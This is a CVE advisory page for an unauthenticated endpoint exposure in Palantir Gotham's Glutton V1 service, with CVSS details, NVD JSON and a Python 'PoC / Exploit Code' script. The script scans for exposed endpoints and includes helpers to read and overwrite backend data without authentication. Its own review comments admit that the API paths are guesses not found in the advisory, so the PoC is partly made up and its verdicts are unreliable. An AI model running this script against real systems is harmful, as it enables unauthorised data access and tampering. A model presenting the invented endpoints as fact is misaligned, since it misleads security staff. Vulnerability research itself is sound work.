Security Vulnerability Report
CVE-2024-49587 CVSS 9.1 CRITICAL

CVE-2024-49587

Published: 2025-12-19 17:15:51
Last Modified: 2026-04-15 00:35:42

Description

Glutton V1 service endpoints were exposed without any authentication on Gotham stacks; this could have allowed users who did not have any permission to hit the Glutton backend directly and read/update/delete data. The affected service has been patched and automatically deployed to all Apollo-managed Gotham instances.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Palantir Gotham (Apollo-managed instances with Glutton V1 service)
Glutton V1 service on Gotham stacks (all versions prior to patch)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-49587 PoC - Unauthenticated Glutton V1 Access
# Palantir Gotham Glutton Service Endpoint Discovery and Access
#
# NOTE(review): the advisory text reproduced on this page names no API paths.
# GLUTTON_BASE_PATH and the endpoint list in check_glutton_exposure() are not
# drawn from it and appear to be guesses; treat them as illustrative, not as a
# confirmed description of the affected service. The script is purely a
# status-code probe: it never validates that a response actually came from a
# Glutton backend.
import requests
import json  # NOTE(review): imported but never used (the `json=` kwarg below is a parameter name, not this module)
import sys

# Default target; overridden by argv[1] in the __main__ block.
TARGET_HOST = "https://gotham-example.palantir.com"
# Prefix appended to TARGET_HOST before every endpoint path.
GLUTTON_BASE_PATH = "/glutton/api/v1"


def check_glutton_exposure(target: str) -> None:
    """Check if Glutton V1 endpoints are exposed without authentication

    Issues one unauthenticated GET per path in ``endpoints`` (under
    GLUTTON_BASE_PATH) and prints the outcome. The verdict is driven solely by
    the HTTP status code: 200 is printed as exposed, 401 as protected, and any
    other code is printed verbatim. The response body is only echoed (first
    200 characters), never inspected.

    Args:
        target: scheme and host the paths are appended to, used verbatim.
    """
    endpoints = [
        "/endpoints",
        "/data",
        "/config",
        "/health",
        "/status"
    ]
    print(f"[*] Scanning {target} for Glutton V1 exposure...")
    for endpoint in endpoints:
        url = f"{target}{GLUTTON_BASE_PATH}{endpoint}"
        try:
            # verify=False disables TLS certificate validation, so nothing here
            # confirms the identity of the host that answered. Unlike the two
            # exploit_* helpers below, this probe does not send any headers.
            response = requests.get(url, timeout=10, verify=False)
            print(f"\n[+] Endpoint: {endpoint}")
            print(f" Status: {response.status_code}")
            if response.status_code == 200:
                # A 200 from a reverse proxy, login page or generic error page
                # would be reported as "VULNERABLE" just the same; the body is
                # not checked.
                print(f" [!] VULNERABLE: Endpoint accessible without auth")
                print(f" Response: {response.text[:200]}")
            elif response.status_code == 401:
                print(f" [+] Protected: Authentication required")
            else:
                # 403, 404, 5xx and everything else end up here without
                # further classification.
                print(f" [-] Status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            # Connection, timeout and URL errors are reported and the loop
            # moves on to the next path.
            print(f"[-] Error accessing {endpoint}: {e}")


def exploit_glutton_read(target: str):
    """Exploit: Read data from Glutton backend without authentication

    Sends a single GET to ``<target><GLUTTON_BASE_PATH>/data`` and returns the
    decoded JSON body when the status is 200. Any other status, any request
    error, and any failure to decode the body all collapse into ``None``, so
    the caller cannot tell "protected" apart from "unreachable" or "not JSON".

    Args:
        target: scheme and host the path is appended to.

    Returns:
        The result of ``response.json()`` on a 200, otherwise ``None``.
    """
    print(f"\n[*] Attempting data read via Glutton API...")
    url = f"{target}{GLUTTON_BASE_PATH}/data"
    # Note: TLS verification is left at the requests default here (enabled),
    # which is inconsistent with the verify=False used in check_glutton_exposure.
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Glutton-Client/1.0"
    }
    try:
        response = requests.get(url, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[!] Successfully retrieved data without authentication!")
            return response.json()
    except:
        # Bare except: swallows every exception, including the decode error
        # raised by response.json() on a non-JSON body and KeyboardInterrupt.
        # Nothing is logged, so failures are silent.
        pass
    return None


def exploit_glutton_write(target: str, data_payload) -> bool:
    """Exploit: Update data via Glutton backend without authentication

    Sends a single POST with ``data_payload`` serialised as JSON to
    ``<target><GLUTTON_BASE_PATH>/data`` and reports success on a 200, 201 or
    204. As in exploit_glutton_read, every exception is swallowed, so ``False``
    covers both "rejected" and "request never completed".

    Args:
        target: scheme and host the path is appended to.
        data_payload: any value accepted by the ``json=`` argument of
            ``requests.post``; the expected schema is not shown in this file.

    Returns:
        ``True`` on a 200/201/204 status, ``False`` otherwise.
    """
    print(f"\n[*] Attempting data update via Glutton API...")
    url = f"{target}{GLUTTON_BASE_PATH}/data"
    headers = {
        "Content-Type": "application/json"
    }
    try:
        # TLS verification is at the requests default (enabled) here as well.
        response = requests.post(url, json=data_payload, headers=headers, timeout=10)
        if response.status_code in [200, 201, 204]:
            print("[!] Successfully updated data without authentication!")
            return True
    except:
        # Bare except: see exploit_glutton_read; all errors become False.
        pass
    return False


if __name__ == "__main__":
    # argv[1] replaces the default target verbatim; nothing checks that it
    # carries a URL scheme or that it is a host the operator is authorised to
    # test. Only the discovery scan runs here; neither exploit_glutton_read
    # nor exploit_glutton_write is invoked anywhere in this file.
    if len(sys.argv) > 1:
        TARGET_HOST = sys.argv[1]
    check_glutton_exposure(TARGET_HOST)
    # Note: Only use for authorized penetration testing

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-49587", "sourceIdentifier": "[email protected]", "published": "2025-12-19T17:15:50.643", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Glutton V1 service endpoints were exposed without any authentication on Gotham stacks, this could have allowed users that did not have any permission to hit glutton backend directly and read/update/delete data. The affected service has been patched and automatically deployed to all Apollo-managed Gotham Instances"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-305"}]}], "references": [{"url": "https://palantir.safebase.us/?tcuUid=95e2d805-dd2f-4544-b164-e61100f47b11", "source": "[email protected]"}]}}